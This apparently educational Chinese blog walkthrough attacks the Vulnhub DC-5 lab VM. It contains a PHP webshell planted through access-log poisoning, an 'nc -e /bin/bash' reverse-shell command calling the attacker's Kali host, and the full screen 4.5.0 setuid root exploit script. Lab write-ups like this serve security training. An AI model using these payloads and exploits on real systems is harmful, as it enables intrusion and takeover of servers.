黑客零基础第三章-Web漏洞实战-文件上传DC5

最新推荐文章于 2023-12-04 17:31:06 发布
最新推荐文章于 2023-12-04 17:31:06 发布
阅读量1.8k 收藏 1
点赞数 2
分类专栏: 零基础黑客训练 文章标签: web安全 系统安全 安全架构 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43879344/article/details/119879336
版权

第五节内容讲述了文件包含漏洞LIF的利用原理,并在DVWA上进行了日志投毒结合LFI入侵的实验。本节以实战的方式,结合vulnhub靶机DC5让大家进一步熟练LFI结合日志投毒的实际应用。
如果靶机部署有疑问,请留言!

目录

1.信息收集

2.获取低权限shell

3.提权

 4.总结

​​​​​​​

1.信息收集

kali IP为192.168.17.4

发现靶机IP 192.168.17.8

使用第二章nmap命令扫描靶机,

nmap -p `nmap -p- --min-rate=10000 -T4 192.168.17.8 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//` -sC -sV --min-rate=10000 192.168.17.8

扫描结果如下,

Starting Nmap 7.80 ( https://nmap.org ) at 2021-08-23 10:44 EDT
Nmap scan report for 192.168.17.8
Host is up (0.00032s latency).

PORT      STATE SERVICE VERSION
80/tcp    open  http    nginx 1.6.2
|_http-server-header: nginx/1.6.2
|_http-title: Welcome
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind                                                                                                                                                            
|   100000  3,4          111/udp6  rpcbind                                                                                                                                                            
|   100024  1          35733/udp6  status
|   100024  1          41448/tcp6  status
|   100024  1          46892/udp   status
|_  100024  1          47115/tcp   status
47115/tcp open  status  1 (RPC #100024)
MAC Address: 08:00:27:7F:98:E9 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.52 seconds

打开网页,是一个类似门户的网站,

枚举后发现contact上存在一个信息输入。

 输入信息后,发现copyright 的信息由2009变为2020,疑似思LFI漏洞。

尝试了一下最简单的file,发现漏洞存在。

 

尝试打开access.log,发现能够打开,可以进行投毒。

2.获取低权限shell

投毒的一句话木马如下,

<?php system($_GET['cmd']) ?>

打开burp,刷新网页截获数据包,修改UA为一句话木马。

尝试触发一句话木马,成功!

在kali开启nc监听4444端口,浏览器输入以下连接,使用nc获取反向shell。

192.168.17.8/thankyou.php?file=/var/log/nginx/access.log&cmd=nc -e /bin/bash 192.168.17.4 4444

3.提权

使用如下命令获取一个可交互式的shell,

python -c 'import pty;pty.spawn("/bin/bash")'

 

使用该命令查看SUID的程序,这里是一个常见的提权枚举。发现screen程序可能存在漏洞。

find / -perm /4000 2>/dev/null

 

seachsploit 命令查找该漏洞PoC,

将Poc拷贝到当前目录,

#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017) 
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...

上面的Poc源码可以看出,整个Poc分为三部分,第一部分是编译出一个动态库的源码,第二部分是编译获取root shell的源码,第三部分是漏洞利用的脚本。

 

将Poc传到靶机,执行发现出错,这个错误可以通过dos2unix解决,

重新下载poc到靶机,执行后出错。

考虑把Poc三个部分分开执行,

 

编译第一部分动态链接库,

gcc -fPIC -shared -ldl -o libhax.so libhax.c

 编译第二部分root shell

gcc -o rootshell rootshell.c

 最终需要三个PoC如下,

 

 将三个文件传到靶机tmp目录,

 运行脚本,成功获取root,

 4.总结

靶机入口是一个门户网站,其中有一个页面存在LFI。测试能够通过LFI访问access.log。使用LFI+日志投毒成功获取低权限shell。

提权是一个SUID的screen提权,过程稍微复杂。

 

 

第七感小宇宙
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 11
    评论
专栏目录
【网络安全】文件包含漏洞--通过日志投毒getshell
你在看屏幕的同时,屏幕也在注视着你
09-04 1万+
文件包含漏洞--通过日志投毒getshell
Vulnhub靶机:DC-5渗透详细过程
IerkeU的博客
03-08 5895
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-5,314/ DC-5是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场与之前的不同,需要具备中级的渗透测试技巧,只有一个可利用的入口点(也没有 SSH),你需要观察一些不寻常的(会随页面动态刷新的)东西,你的最终目标是放在root目录下的flag。 靶场攻略 信息收集 扫描c段发现目标主
利用CVE-2021-3156进行远程提权
Zero_wenlong的博客
10-30 3195
利用CVE-2021-3156进行远程提权 一、漏洞简介 2021年1月26日,Linux安全工具sudo被发现严重的基于堆缓冲区溢出漏洞。利用这一漏洞,攻击者无需知道用户密码,一样可以获得root权限,并且是在默认配置下。此漏洞已分配为CVE-2021-3156,危险等级评分为7分. 当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或-i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。因此只要存在sudoers文件(
CVE-2020-1938 Tomcat文件包含漏洞复现
qq_49279082的博客
02-14 2490
CVE-2020-1938Tomcat文件包含漏洞复现
CVE-2020-0796漏洞利用
彼岸花苏陌的博客
12-01 782
CVE-2020-0796漏洞利用 漏洞环境 攻击方:192.168.216.136(kali linux) 靶机:192.168.216.140(windows 10) 攻击所需软件:暂无 利用方法: 1.先下载检测程序 cd ~ git clone https://github.com/ollypwn/SMBGhost.git cd SMBGhost/ python3 scanner.py 192.168.216.140 但是需要安装netaddr,否则会出现这个错误 Traceback (most
靶机渗透练习09-driftingblues9
Force~
04-01 3330
靶机地址: https://www.vulnhub.com/entry/driftingblues-9-final,695/ 1、主机探活 arp-scan -I eth0 -l (指定网卡扫) 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息) masscan 192.168.111.0/24 -p 80,22 (masscan 扫描的网段 -p 扫描端口号) netdiscover -i eth0 -r 192.168.184.0/24 (netdiscover -i 网卡-r 网段) n.
vulnhub靶场实战系列-DC-2实战
最新发布
05-18
vulnhub靶场实战系列-DC-2实战
WEB漏洞扫描器-AWVS 2020年4月最新版acunetix_14.7.220401065
04-18
量身定制的Web安全设备往往不够测试出一些还未发现的漏洞,因此容易成为黑客攻击目标。 Acunetix -在全世界范围内领先的网络应用安全设备 Acunetix开创了网络应用安全扫描技术:它的工程师们潜心研究网络安全。早...
WEB安全-注入漏洞
10-11
WEB安全-注入漏洞,很好的学习PPT SQL注入是一种Web应用代码中的漏洞黑客可以构造特殊请求,使Web应用执行带有附加条件的SQL语句 用户请求中带有参数的值,没有进行任何过滤 用户请求中带有参数的值,没有进行...
网络安全之NMAP工具
月生的静心苑
03-28 1655
一、NMAP简介   nmap是一个网络探测和安全扫描程序,系统管理者和个人可以使用这个软件扫描大型的网络,获取那台主机正在运行以及提供什么服务等信息。nmap支持很多扫描技术,例如:UDP、TCP connect()、TCP SYN(半开扫描)、ftp代理(bounce攻击)、反向标志、ICMP、FIN、ACK扫描、圣诞树(Xmas Tree)、SYN扫描和null扫描。从扫描类型一节可以得到细节。nmap还提供了一些高级的特征,例如:通过TCP/IP协议栈特征探测操作系统类型,秘密扫描,动态延时和重传计
栈溢出攻击提权进入root shell
lyx2007825的专栏
11-11 4307
以前对栈溢出攻击只是一种感官上的,最近学了shellcode,决ding
Web安全文件上传漏洞测试(防止 黑客利用此漏洞.)
网络安全领域___专研者.
05-21 2326
现在大多的网站和Web应用系统都会有上传功能(比如:文档,图片,头像,视频上传等.),而程序员在开发文件上传功能时,没有对代码做严格校验上传文件的后缀和文件类型. 此时攻击者就可以上传一个与网站脚本语言相对应的恶意代码动态脚本,例如(php,jsp、aspx,asp文件后缀)到服务器上,并将恶意文件传递给网站脚本语言去执行,然后就可以在服务器上执行恶意代码,进行数据库执行、服务器文件管理,服务器命令执行等恶意操作.
WEB入门——文件上传漏洞
HasntStartIsOver的博客
06-04 4445
文件上传漏洞服务端代码未对客户端上传的文件进行严格的验证,导致漏洞。如果.php后缀被限制,可以尝试:.php3、php4、.PHp(修改大小写)、.phtml、.pht等后缀,WebShell的内容一样。这两个配置的意思就是:我们指定一个文件,那么该文件就会被包含在要执行的php文件中(如index.php)。如果客户端JS脚本有加限制(例如上传图片,JS脚本显示了只能上传图片格式,不能上传.php后缀的文件)。1、上传的文件是web脚本语言,服务器的web容器解释并执行了用户上传的脚本,脚本语言执行。
DC-5靶机渗透测试
读书 买花 长大
03-14 1131
DC-5
nmap渗透测试--版本探测
互联网老辛
10-13 3315
在文章讲解之前先公布一个消息: 所有参与活动获赠新书的童鞋,昨天书籍已经发出..只剩一本关于docker的,一直没有人认领,已经转为下期活动的奖品.再次呼吁...
任意文件上传漏洞实战和防范
weixin_39445116的博客
12-04 382
文件上传漏洞广泛存在于Web1.0时代,恶意攻击者的主要攻击手法是将可执行脚本(WebShell)上传至目标服务器,以达到控制目标服务器的目的。
文件上传漏洞-06】Web容器解析漏洞实战详解
cc
02-18 4180
文件上传漏洞第一个条件是文件成功上传且没能过滤掉恶意代码;第二个条件是让代码执行。对于第一个条件,存在着前端JS检测绕过、服务端MIME类型绕过、服务端后缀名绕过、文件内容绕过等,其根本目的是要上传文件。对于第二个条件,当中间件为IIS时:优先考虑绕过后缀名时采用恶意代码能够执行的后缀,这样文件能直接执行;当IIS版本为5.x或6.x时,考虑利用文件解析漏洞、目录解析漏洞执行该文件;当IIS版本为7.x时,考虑利用CGI-PHP解析漏洞来执行该文件。
黑客攻防技术宝典web实战篇pdf
12-10
黑客攻防技术宝典web实战篇pdf》是一本关于网络安全实战技术手册,全书内容包括网络攻击与防御的基础知识、常见的Web攻击技术、渗透测试、安全防护等方面的知识。书中详细介绍了黑客常用的攻击手法,以及如何利用这些手法加强网络安全防御措施。 这本书的特点是深入浅出,易于理解,适合初学者和网络安全技术从业人员阅读使用。书中所介绍的技术手法不仅可以帮助读者了解黑客攻击的原理和方法,还可以让读者学会如何进行渗透测试,发现和修补网站的安全漏洞,提高网络安全水平。 《黑客攻防技术宝典web实战篇pdf》还涵盖了现实中常见的网络攻击案例,以及面对这些攻击时应该如何应对和防范的方法。通过学习这本书,读者可以更好地了解网络安全攻防的基本原理,提高自身的网络安全意识,为网络安全工作提供帮助。 综上所述,《黑客攻防技术宝典web实战篇pdf》是一本实用的网络安全技术手册,适合对网络安全感兴趣的人阅读学习,帮助他们更好地了解网络安全,提高网络安全防御能力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 11
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值